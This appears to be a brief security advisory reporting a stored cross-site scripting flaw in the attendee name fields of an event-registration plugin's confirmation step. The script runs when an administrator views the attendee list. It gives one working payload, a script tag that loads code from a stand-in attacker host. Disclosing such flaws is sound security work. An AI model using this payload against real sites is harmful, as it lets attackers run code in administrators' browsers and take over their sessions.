There is a persistent XSS in attendee's first name and last name fields on registration confirmation (evr_public-process_confirmation.php). Quotes are escaped but the following vector still succeeds and is executed e.g. in Firefox and Chrome:<script src=http://evil.example.com/evil.js></script>

When injected as first name or last name on the attendee's registration confirmation page (2. step in the attendee's default registration process), the injected script gets loaded as soon as a backend user visits the list of attendees.

A demonstration of the XSS issues can be found here: https://www.youtube.com/watch?v=N4eaCAhk-a0